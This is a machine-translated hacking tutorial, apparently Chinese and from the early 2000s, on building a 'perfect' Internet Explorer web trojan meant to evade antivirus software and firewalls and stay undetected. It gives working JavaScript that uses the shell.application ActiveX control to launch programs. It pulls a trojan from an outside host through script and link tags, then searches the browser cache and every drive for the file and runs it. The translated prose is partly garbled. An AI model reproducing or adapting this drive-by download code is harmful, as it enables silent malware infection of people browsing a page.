Create the perfect Internet Explorer Web Trojan _ Vulnerability Research

Author: Green Snow Source: Eighth Regiment
Since to create the perfect IE Web Trojan, first of all must give us a perfect standard, I personally think a perfect IE web Trojan should have at least the following four features:
One: Can avoid the killing of anti-virus software;
Two: can avoid the network firewall alarm;
III: Most versions of IE (mainly including WIN2003) can be applied to most Windows operating systems (mainly including WIN98, WinME, WIN2000, WinXP, IE5). 0, IE5. 5, IE6. 0), it is best to bring down SP patch;
Four: Let the viewer is not easy to detect IE changes, that can be silently, so that can be long undetected.
Note that the above four points just refers to the Web page itself, but does not include your Trojan program, that is, our web Trojan is only responsible for running the designated Trojan, as for your Trojan program is only your own choice! Don't look for me, I can't write. ）
Meet the above four points I think you can make your horse more youthful longer, run more huan faster ...
Look at the top points, are you a heartbeat? Do not worry, we still first regaling existing all kinds of IE web trojans lack of it!
The first: Using the old mime loophole of IE Web Trojan
This trojan is still popular, but because this loophole is too old and the application of IE version less, and the impact is too large, patch almost all up, so the success rate of this Trojan is relatively low.
The second: Using com.ms.activeX.ActiveXComponent vulnerability, combined with WSH and FSO control of IE Web Trojan
Although com.ms.activeX.ActiveXComponent vulnerabilities are widely found in most IE versions, is a relatively good loophole, the use of very high value, but because it combines the popular virus calls WSH and FSO control, so that although it can avoid the network firewall alarm, can escape anti-virus software hunt ( such as Norton).
Third: Using object type to confirm the vulnerability (Object data remote) and combining WSH and FSO control of IE Web Trojan (typical representative of the dynamic Shark Web Trojan generator)
The biggest advantage of this Trojan is the adaptation of the IE version of more, and the vulnerability is newer, but has the following deficiencies:
1, because this vulnerability to call Mshta.exe to access the network download Trojan, so will cause firewall alarm (such as Skynet firewall);
2, if this Internet Explorer Trojan horse and the use of WSH and FSO control, the same escape from the pursuit of anti-virus software (such as Norton), and
Movable shark Web Trojan also precisely uses the WSH and the FSO control, sighs the tone ... What a pity ...?
3, and then there is this vulnerability requires Web server support Dynamic Web pages such as ASP, JSP, CGI, and so on, which has affected its play, after all, now the free and stable Dynamic Web page space is very few; although this vulnerability can also take the form of mail MIME (see my article on Security focus: " By the use of the error MIME vulnerability ...---IE Object data remote Execution Vulnerability Utilization "http://www.xfocus.net/articles/200309/607.html) to use, but tested on IE6. 0 does not work.
See the above analysis you do not have this feeling: the Thousand Army is easy, one will be difficult to beg, the horse is flocks, but the steed is difficult to find! Don't worry, let me take this all together to build my heart's perfect ie Web Trojan.
First of all to avoid the killing of antivirus software, we can not use WSH and FSO control, because as long as the use of WSH and FSO control will certainly escape the "Norton" of the pursuit, which can call us how to be good? Don't worry, after my hard work (really I am also in the study of ASP Trojan accidentally found inspiration) finally I have found a control that can be used, that's shell.application, and it's securely authenticated and can be implemented unimpeded in the pages of my computer domain. Easier to execute than WSH and FSO (leveraging Cross-domain vulnerabilities), see the following JavaScript code:
<script language= "javascript" type= "Text/javascript" >
var shell=new activexobject ("shell.application");
Shell.namespace ("C:\\windows\\"). Items (). Item ("Notepad.exe"). Invokeverb ();
</SCRIPT>
Save As Test.htm opened to see if the Notepad automatically opened, and will not be like WSH and FSO to allow the operation of the prompt box, is not a bit interested? Now we can run all known paths of the program, but we ask to run our own Trojan, so we also ask to download our Trojan program to the viewer's computer and find its location. We solve each of them:
1, download Trojan program to the viewer's computer
There are a number of solutions to this, such as the Windows Help file access Protocol I mentioned earlier that downloads any file Vulnerability (its:), but this time we don't need it to teach you two better ways to download it:
Example: Using the script tag, the code is as follows:
<script language= "Icyfoxlovelace" src= "Http://www.godog.y365.com/wodemuma/icyfox.bat" ></SCRIPT>
Note that the language attribute here can be a string other than JavaScript, VBScript, JScript, or Chinese characters, and the properties of SRC are, of course, the address of your Trojan horse program! Because now free space for security reasons, most do not allow the upload exe file, we can modify the extension exe to bat or PIF, SCR, COM, can also run.
Example two: Using the link tag, the code is as follows:
<link href= "Http://www.godog.y365.com/wodemuma/icyfox.bat" Rel=stylesheet type=text/css>
Put the code in the middle of the label <HEAD></HEAD>, the href attribute value is the address of the Trojan program.
The above two are the best I know the two ways to download Trojans, they downloaded programs are saved in the IE temporary directory Temporary Internet Files directory under the subdirectory.
2, find the browser has been downloaded to the brain of the Trojan program path
We can use the Shell.Application control of some properties and methods, combined with JS error handling Try{}catch (e) {}finally{} statements, recursion to find the path of the trojan, the code is as follows: function Icyfoxlovelace () {
Get Windows system directory and system disk
Url=document.location.href;
Xtmu=url.substring (6,url.indexof (' \ \ ', 9) +1);
Xtp=url.substr (6,3);

var shell=new activexobject ("shell.application");
var runbz=1;

The size of the Trojan is set here, in bytes
Please change 198201 to the actual size of your Trojan program
var exesize=198201;

Set the Trojan horse program name and extension (EXE,COM,BAT,PIF,SCR), used to determine whether the Trojan program is downloaded
Please change the Icyfox in the following two lines to your Trojan program name, bat to your trojan program extension
var a=/icyfox\[\d*\]\.bat/gi;
A.compile ("Icyfox\\[\\d*\\]\\.bat", "GI");

var b=/[a-za-z]:\\/gi;
B.compile ("[a-za-z]:\\\\", "GI");//Regular expression to determine if the root of the disk

The following code finds and runs the Trojan horse program
WJJ (xtmu+ "temporary Internet files\\");//content.ie5\if (RUNBZ) wjj (xtp+ "Documents and Settings\\");
if (RUNBZ) YP ();

Locate and run the Trojan horse under all hard disk partitions
Function YP () {
try{
var c=new enumerator (Shell.namespace ("c:\\"). Parentfolder.items ());
for (;! C.atend (); C.movenext ()) {
if (RUNBZ) {if (B.test (C.item (). Path)) WJJ (C.item (). path);}
else break;
}
}catch (e) {}
}

Use recursion to find and run a Trojan program under the specified directory (including subdirectories)
function Wjj (b) {
try{
var c=new enumerator (Shell.namespace (b). Items ());
for (;! C.atend (); C.movenext ()) {
if (Runbz&&c.item (). Size==exesize&&a.test (C.item (). Path)) {
var f=c.item (). path;
var v=f.lastindexof (' \ \ ') +1;
try{
Shell.namespace (f.substring (0,v)). Items (). Item (F.SUBSTR (v)). Invokeverb ();//Run Trojan program
runbz=0;
Break
}catch (e) {}
}
if (!c.item (). Size) WJJ (C.item (). path+ "\");//If a subdirectory is called recursively
}
}catch (e) {}
}
}
Icyfoxlovelace ();
Please save the above code as icyfox.js.